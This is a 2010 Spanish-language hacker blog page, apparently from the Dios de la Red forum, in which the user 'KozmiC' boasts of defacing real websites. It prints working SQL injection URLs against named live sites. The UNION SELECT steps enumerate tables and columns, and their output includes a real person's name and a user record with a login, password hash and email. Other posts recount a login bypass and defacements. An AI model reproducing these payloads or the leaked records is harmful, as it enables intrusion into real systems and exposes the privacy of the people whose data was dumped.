Yo

Mi nick es KozmiC,soy un joven argentino que vivo en España,donde esta desarrollando su poco de intelecto que tiene enfocado a la programación.



Aficiones que tengo,provablemente muchas pero las más activas actualmente son,la Programación de herramientas relacionadas con Red en PHP,el Parkour,el Tricking y claro que si chicas tan lindas como w0rm. (L)



Mi estilo musical,no es más que otro que el Metal,pero tengo que admitir que el Rap me apasiona,tal vez que sea por que la lirica es un mundo de pura poesía...no lo se.

¿Por Qué en DDLR?

Cualquier persona puede decir que "Dios de la Red" es una comunidad como otra,simplemente con una interfaz diferente.



Yo solo digo que DDLR,es más que una comunidad por que no solo se aprende aca,se gana experiencia como informatico/a y como persona.



Yo digo si a Dios de la Red y si a la Informática,A las vulnerabilidades y a los códigos en PHP. +1.

I am ...

Yo haciendo lo mejor que se... ^^



Blogroll: 18

[x] Agregar a kozmic

joker joker
gothicx gothicx
iquitoshack iquitoshack
papapitufo papapitufo
reactos reactos
kove kove
blackrusian blackrusian
ca0s ca0s
pride pride
linuxfer linuxfer
sm4ll sm4ll

... Ver todos

Perfil de kozmic

[x]Nick: kozmic
Rango: Newbie
País: ar
Visitas: 4227
Votos: 4
En Blogrolls: 11
Status: PM

Patrocinadores:


Anuncia aquí

http://www.segundadivisionfmf.org.mx [OWNED]

Publicado el 10/08/2010 12:08:00 en Bug Report.

Sobre las 6:30 am,comenze el proceso de "Ownear" el sitio web llamado "www.segundadivisionfmf.org.mx",el método que utilize fue MSSQL Injection,y no me fue nada difícil modificar el "index" por vía UPDATE. ^^
El index es bastante sencillo porque tengo mejores cosas que "defacear". XD

Dedicado a Dios de la Red en general.




http://www.segundadivisionfmf.org.mx

Comentarios: 20 | Leer comentarios

[x] [SQL] http://investigacion.ilce.edu.mx

Publicado el 10/08/2010 12:08:00 en Bug Report. Total de votos: 0  Votar



Site: http://investigacion.ilce.edu.mx
Script vulnerable: st.asp
Variable no filtrada: ?id=
Panel del Admin: http://investigacion.ilce.edu.mx/panel_control/

Inyección:

http://investigacion.ilce.edu.mx/st.asp?id=%27%27%20group%20by%20c.primer_menu_superior,c.segundo_menu_superior,c.menu_lateral,s.css,p.clave_pagina,p.incluir_titulos_con_ligas,p.titulo,p.url,p.clave_estatus,p.orden,c.categoria,c.fondo,p.fondo,c.clave_categoria,p.mostrar_encabezado,p.mostrar_boton_de_impresion,p.incluir_en_pasa_paginas,p.mostrar_control_de_menu_lateral,p.clave_sitio,p.mostrar_margenes,p.mostrar_banner,s.clave_idioma_predeterminado,p.mostrar_calendario,p.mostrar_anuncio,c.titulo_anuncio,c.anuncio,p.ancho_del_anuncio,p.alto_del_anuncio,c.acceso_condicionado_a_calificacion_del_cuestionario,c.acceso_condicionado_a_calificacion_del_foro,p.encabezado,p.velocidad_anuncio%20having%201=1%20--


Comentarios: 1 | Leer comentarios

[x] [SQL] www.biapi.com

Publicado el 09/08/2010 12:08:00 en Bug Report. Total de votos: 1  Votar

Site: http://www.biapi.com/ Script vulnerable: agencia.php Variable no filtrada: ?id= Versión: 5.0.51a-3ubuntu5.5-log Usuario: apibnc@localhost Basedir: /usr/ Inyección:
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.tables--
Printea:
6
7
8
11
12
13
14
15
Inyección.Tablas (Con Group_Concat()):
Printea (Cortado):
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,API_CCC,API_Tvaloraciones,API_articulos,API_cambios_datos,API_cambios_datos_alta_despacho,API_cambios_da
Inyección.Columna (API_cambio_datos):
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns+where+table_name=char(65,80,73,95,99,97,109,98,105,111,115,95,100,97,116,111,115)--
Printea (Cortado):
id,idcens,nombre_colegiado,n_provincial,n_carnet_nac,nombre,fac_nif,fac_nombre,fac_direccion,fac_cp,fac_provincia,fac_localidad,fac_domiciliacion,fac_pago,pri_dni,pri_fechanac,pri_sexo,pri_telefono,pri_emailpersonal,pri_direccion_part,pri_cp_part,pri_provincia_part,pri_localidad_part,pri_direccion_corr,pri_cp_corr,pri_provincia_corr,pri_lo
Inyección Final (API_cambio_datos):
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,concat%28id,0x3a,idcens,0x3a,nombre_colegiado,0x3a,n_provincial,0x3a,n_carnet_nac,0x3a,nombre%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+API_cambios_datos--
Printea:
20:547:VALENCIA GARRIGA, JOAN-RAM�N:1730:11603:VALENCIA GARRIGA, JOAN-RAM�N 
Inyección.Columna (API_usuarios):
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,group_concat%28column_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns+where+table_name=char%2865,80,73,95,117,115,117,97,114,105,111,115%29--
Printea:
id,login,pass,email,nombre,app,privilegios
Inyección Final (API_usuarios):
http://www.biapi.com/agencia.php?id=-1+union+select+1,2,3,4,5,concat%28id,0x3a,login,0x3a,pass,0x3a,email,0x3a,nombre,0x3a,app,0x3a,privilegios%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+API_usuarios--
Printea:
5:nestor:seHoVKe8ltQ4s:dpassola@infoself.com:Beta Solutions:: 
PD: Hecho todo a mano,sin software. ^^

Comentarios: 11 | Leer comentarios

[x] [SQL] http://keya.cat

Publicado el 09/08/2010 12:08:00 en Bug Report. Total de votos: 0  Votar

Site: http://keya.cat
Script Vulnerable: categoria-info.php
Variable no filtrada: ?id=

Inyección:

http://keya.cat/categoria-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--


Aun no hay sido reportado [X]

Comentarios: 1 | Leer comentarios

http://sexo-escorts.com [OWNED]

Publicado el 09/08/2010 12:08:00 en Hacking Web.

Todo comienzo a las 8:30 de la mañana cuando estaba navegando por la red y me enconte esta curiosa web,de Madrid (Spain) si no me equivoco,entonces decidi introducirme por una SQLi,pero tenia como 32 o 33 y me cansaba y entonces pense en hacer un Login Bypass y surgio efecto un error poco normal,ya que actualmente en eso los programadores no se equivocan,despues me di cuenta que seguia siendo un usuario de bajo privilegios,me fui para el directorio del Admin:

http://sexo-escorts.com/administrar/


Y si,tambien se podia bypassear,lo malo es que no puse subir una shell,tal vez por que estaba bien asegurada o por que soy un boludo que tiene sueño,entonces desactive unos banners y active la seccion de noticias y desde el titulo lo Ownee. XD

http://sexo-escorts.com/index.php



Comentarios: 5 | Leer comentarios